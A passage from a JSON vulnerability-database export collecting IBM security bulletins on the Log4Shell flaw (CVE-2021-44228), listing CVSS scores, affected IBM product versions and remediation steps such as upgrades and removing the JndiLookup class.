\nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIndustry Models - IBM Insurance Information Warehouse| 8.10 \nIndustry Models - IBM Insurance Information Warehouse| 8.9 \nIndustry Models - IBM Insurance Information Warehouse| 8.8 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by executing these steps:**\n\n1) Delete any existing versions of the file GlossaryTools-1.5.zip and all associated extracted files\n\n2) Download and extract the file, GlossaryTools-1.5.1.zip located at <https://github.com/IBM-IndustryModels/Tooling-As-Is/tree/master/igc/GlossaryTools>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T18:32:37", "type": "ibm", "title": "Security Bulletin: IBM Insurance Information Warehouse is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-30T18:32:37", "id": "5F61B9F9A964CB3CBB554CD28E3CE9FF36CED8CD1357DB2E45299E1C329C251A", "href": "https://www.ibm.com/support/pages/node/6537656", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:11:18", "description": "## Summary\n\nBased on current information and analysis, IBM Jazz for Service Management does not use Apache log4j-core library which is vulnerable to CVE-2021-44228. However, IBM Jazz for Service Management may be impacted because the old version of Log4j-1.2-api and Log4j-api are used in the application. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nJazz for Service Management| 1.1.3 \n \n## Remediation/Fixes\n\n**Affected JazzSM Version**| **Recommended Fix.** \n---|--- \nJazz for Service Management versions 1.1.3 - 1.1.3.6| \n\n**Note:** 1.1.3.13-TIV-JazzSM-DASH-iFix-0001 has been superseded by [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )\n\n1\\. Upgrade to any of the following: [1.1.3-TIV-JazzSM-multi-FP07, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP010\" )[1.1.3-TIV-JazzSM-multi-FP08, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP010\" )[1.1.3-TIV-JazzSM-multi-FP09, ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP010\" )[1.1.3-TIV-JazzSM-multi-FP010](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP010\" ), [1.1.3-TIV-JazzSM-multi-FP011](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP011\" ), [1.1.3-TIV-JazzSM-multi-FP012](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP012\" ), [1.1.3-TIV-JazzSM-multi-FP013](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3-TIV-JazzSM-multi-FP013\" )\n\n2\\. Install JazzSM 1.1.3.13 iFix01, [1.1.3.13-TIV-JazzSM-DASH-iFix-0001](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0001\" )\n\n3\\. To apply WebSphere Application Server iFix, refer [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \n \nJazz for Service Management versions 1.1.3.7 - 1.1.3.13| \n\n**Note:** 1.1.3.13-TIV-JazzSM-DASH-iFix-0001 has been superseded by [1.1.3.13-TIV-JazzSM-DASH-iFix-0003](<https://www.ibm.com/support/pages/node/6536710> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0002\" )\n\n1\\. Install JazzSM 1.1.3.13 iFix01, [1.1.3.13-TIV-JazzSM-DASH-iFix-0001](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product=ibm/Tivoli/Jazz+for+Service+Management&release=All&platform=All&function=all> \"1.1.3.13-TIV-JazzSM-DASH-iFix-0001\" )\n\n2\\. To apply WebSphere Application Server iFix, refer [Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6525706> \"Security Bulletin: Vulnerability in Apache Log4j affects WebSphere Application Server \\(CVE-2021-44228\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-10T06:18:22", "type": "ibm", "title": "Security Bulletin: IBM Jazz for Service Management is vulnerable to a Apache Log4j vulnerability(CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-10T06:18:22", "id": "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "href": "https://www.ibm.com/support/pages/node/6527246", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:12:34", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Netcool Agile Service Manager. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nNetcool Operations Insight 1.6| Netcool Operations Insight 1.6 \nIBM Netcool Agile Service Manager| 1.1 \n \n## Remediation/Fixes\n\n**On-prem**\n\n[Download IBM Netcool Agile Service Manager V1.1.10 on premise](<https://www-01.ibm.com/support/docview.wss?uid=swg24043717> \"Download IBM Netcool Agile Service Manager V1.1.10 on premise\" )\n\n## Workarounds and Mitigations\n\nIf you are using 1.1.9 or any earlier versions, you should upgrade to 1.1.10.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T18:45:10", "type": "ibm", "title": "Security Bulletin: IBM Netcool Agile Service Manager is affected by a vulnerability in Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T18:45:10", "id": "19613990614CDAB7F34154F3A620BBF18E7F15F79F3D35FBEB7EC2FC9249AD2C", "href": "https://www.ibm.com/support/pages/node/6536664", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:14:19", "description": "## Summary\n\nLog4j is used by IBM\u00ae Disconnected Log Collector to log system events. This bulletin provides a remediation for the vulnerability, CVE-2021-44228 by upgrading IBM\u00ae Disconnected Log Collector and thus addressing the exposure to the log4j vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Disconnected Log Collector v1.0 - v1.7\n\n## Remediation/Fixes\n\n[IBM Disconnected Log Collector v1.7.1](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Security+QRadar+SIEM&release=All&platform=Linux&function=fixId&fixids=DLC-1.7.1&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM Disconnected Log Collector v1.7.1\" )\n\nThe recommendation is to apply the fix as soon as possible.\n\nFor guidance on installing the RPM, see the [DLC docs](<https://www.ibm.com/docs/en/qradar-common?topic=collector-installing-upgrading-disconnected-log>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T20:00:24", "type": "ibm", "title": "Security Bulletin: Log4j as used in IBM\u00ae Disconnected Log Collector is vulnerable to remote code execution (RCE) (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T20:00:24", "id": "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "href": "https://www.ibm.com/support/pages/node/6526178", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:14:38", "description": "## Summary\n\nThere is a vulnerability in Log4j2 used by IBM Spectrum LSF. IBM Spectrum LSF have addressed the applicable CVE. LSF is only vulnerable if resource connector is enabled. Customers are encouraged to take action by executing the mitigation steps.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum LSF| 10.1.x \n \n \n\n\n## Remediation/Fixes\n\nPatch will be released once available.\n\n## Workarounds and Mitigations\n\n**IBM strongly recommends addressing the vulnerability now by executing these steps:**\n\n**Product**| **VRMF**| **APAR**| **Remediation/First Fix** \n---|---|---|--- \nSpectrum LSF| 10.1.x| None| \n\n1) Remove the JndiLookup class from the classpath in following jar files: \nLSF_TOP/10.1/resource_connector/aws/lib/log4j-core-*.jar. \nLSF_TOP/10.1/resource_connector/azure/lib/log4j-core-*.jar. \nLSF_TOP/10.1/resource_connector/google/lib/log4j-core-*.jar. \nLSF_TOP/10.1/resource_connector/cyclecloud/lib/log4j-core-*.jar. \nLSF_TOP/10.1/resource_connector/openshift/lib/log4j-core-*.jar. \nLSF_TOP/10.1/resource_connector/softlayer/lib/log4j-core-*.jar.\n\n(example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). \n\n2) Restart ebrokerd by badmin mbdrestart \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T05:25:57", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j2 affects IBM Spectrum LSF. (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T05:25:57", "id": "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "href": "https://www.ibm.com/support/pages/node/6527742", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:14:39", "description": "## Summary\n\nThere is a vulnerability in the version of Apache Log4j that was included in Watson Knowledge Catalog InstaScan. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nWatson Knowledge Catalog InstaScan| 1.1.6 or any prior versions \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to Watson Knowledge Catalog InstaScan version 1.1.7. \n\nIn order to upgrade to the 1.1.7 version, please run the following command on the infrastructure node of the OpenShift cluster:\n\n./cpd-cli upgrade --repo &lt;your-repo.yaml&gt; -a wkc-instascan -n &lt;your-name-space&gt; \\--verbose --accept-all-licenses\n\nReplace &lt;your-repo.yaml&gt; with the name of the repository yaml file and &lt;your-name-space&gt; with the actual OpenShift project name (Kubernetes namespace) where the product is installed.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T04:55:42", "type": "ibm", "title": "Security Bulletin: Log4JShell Vulnerability affects Watson Knowledge Catalog InstaScan (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T04:55:42", "id": "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "href": "https://www.ibm.com/support/pages/node/6527734", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:14:49", "description": "## Summary\n\nThere is a vulnerability in Apache Log4j (CVE-2021-44228) that is affecting IBM Engineering Requirements Management DOORS. This only affects customer who install the knowledge center on their computer. The IBM Engineering Requirements Management DOORS Server Windows installer contains the knowledge center KC_CI.zip. This optionally can be unzipped to install the knowledge center to use the help locally. Version 1.5.1 of the knowledge center KC_CI.zip contains Apache log4j version 2.0.2\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Engineering Requirements Management DOORS Family| 9.6.1.7 - 9.7.2.2 \n \n\n\n## Remediation/Fixes\n\nThe DOORS Affected Versions are listed below which contain the Knowledge center KC_CI.zip version 1.5.1. \n\n\nVersion 1.5.1 of the knowledge center KC_CI.zip contains log4j version 2.0.2.\n\n**Affected Products and Versions** \n \n\n\nIBM Engineering Requirements Management DOORS: 9.6.1.7 - 9.6.1.11\n\nIBM Engineering Requirements Management DOORS: 9.7 - 9.7.0.1\n\nIBM Engineering Requirements Management DOORS: 9.7.1\n\nIBM Engineering Requirements Management DOORS: 9.7.2 - 9.7.2.2 \n \n**Remediation/Fixes** \n \nUpgrade to the version 2.0 of the knowledge center KC_CI.zip \n \n\n\nIBM Engineering Requirements Management DOORS| KC_CI.zip \n---|--- \n9.6.1.7 - 9.6.1.11| [2.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"2.0\" ) \n9.7 - 9.7.0.1| [2.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"2.0\" ) \n9.7.1| [2.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"2.0\" ) \n9.7.2 - 9.7.2.2| [2.0](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Engineering&product=ibm/Rational/IBM+Engineering+Requirements+Management+DOORS&release=All&platform=All&function=fixId&fixids=9.7.2.5-DOORS-fixpack&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"2.0\" ) \n \n \n**Procedure:** \n \n1\\. Download the IBM Engineering Requirements Management DOORS Server Windows installer \nDOORS_Server_9-7-2-5_Windows.zip \n2\\. Unzip and install the server setup.exe on a temporary Windows machine \n3\\. Copy the file KC_CI.zip from this directory \nC:\\Program Files (x86)\\IBM\\Rational\\DOORS\\9.7.2.5\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install \n4\\. Update your existing server Windows machine \nFor IBM Engineering Requirements Management DOORS 9.6.* \nC:\\Program Files (x86)\\IBM\\Rational\\DOORS\\&lt;version&gt;\\Server\\ibm\\Rational\\DOORS\\9.6\\kcci_install \nFor IBM Engineering Requirements Management DOORS 9.7.* \nC:\\Program Files (x86)\\IBM\\Rational\\DOORS\\&lt;version&gt;\\Server\\ibm\\Rational\\DOORS\\9.7\\kcci_install \n5\\. Delete the contents of that directory kcci_install \n6\\. Copy KC_CI.zip (129 MB) version 2.0 into that directory and unzip\n\nThe KCCI contents for the DOORS Help can be found: \n<http://download.boulder.ibm.com/ibmdl/pub/software/rationalsdp/documentation/kcci_content/doors_help/>[ \n \n](<http://download.boulder.ibm.com/ibmdl/pub/software/rationalsdp/documentation/kcci_content/doors_help/>)Further information on installing help on your computer \n[https://www.ibm.com/docs/en/ermd/9.7.2?topic=applications-installing-help-your-computer](<https://www.ibm.com/docs/en/ermd/9.7.1?topic=applications-installing-help-your-computer>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:13:54", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability is affecting IBM Engineering Requirements Management DOORS", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T21:13:54", "id": "2042D81324560EA3A6747DAF5E2633EFD4EC3C4BB62989E7EF2C6A1F73035677", "href": "https://www.ibm.com/support/pages/node/6527328", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T19:13:52", "description": "## Summary\n\nThe Apache Log4j vulnerability (CVE-2021-44228) affects the z/Transaction Processing Facility (z/TPF) system and TPF Operations Server. Several Java applications on the z/TPF system depend on Apache Log4j capabilities. Additionally, the 64-bit Java support in TPF Operations Server uses Apache Log4j capabilities. All components in the z/TPF system and TPF Operations Server that use Apache Log4j have been updated to use Apache Log4j 2.16.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nz/Transaction Processing Facility| 1.1 \nTPF Operations Server| 1.2.06 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR| Remediation/First Fix \n---|---|---|--- \nz/TPF| 1.1| PJ46688| Apply the APAR, which is available for download from the [TPF Family Products: Maintenance for z/TPF &amp; z/TPFDF](<https://www.ibm.com/support/pages/node/618275> \"TPF Family Product: Maintenance\" ) web page. \nTPF Operations Server| 1.2.06| IT39419| \n\nApply the APAR, which is available for download from the [TPF Product 